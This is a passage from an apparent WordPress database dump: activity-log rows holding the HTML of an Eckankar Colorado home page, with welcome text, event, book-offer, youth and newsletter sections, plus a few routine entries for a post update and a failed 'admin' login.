Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237035,40283,'post_prev_post_content','<div style=\"height: 34%; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237032,40283,'post_id','7160'),(237033,40283,'post_type','page'),(237034,40283,'post_title','Home'),(237031,40282,'_server_remote_addr','20.168.8.x'),(237030,40282,'_message_key','user_unknown_login_failed'),(237028,40282,'failed_username','admin'),(237029,40282,'server_http_user_agent','Mozilla/5.0'),(237027,40281,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(237026,40281,'_server_remote_addr','76.130.120.x'),(237024,40281,'_user_login','S8zhaBda'),(237025,40281,'_user_email','nada@zipnadanot.org'),(237023,40281,'_user_id','2'),(237022,40281,'_message_key','post_updated'),(237021,40281,'post_new_post_content','<div style=\"height: 34%; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" 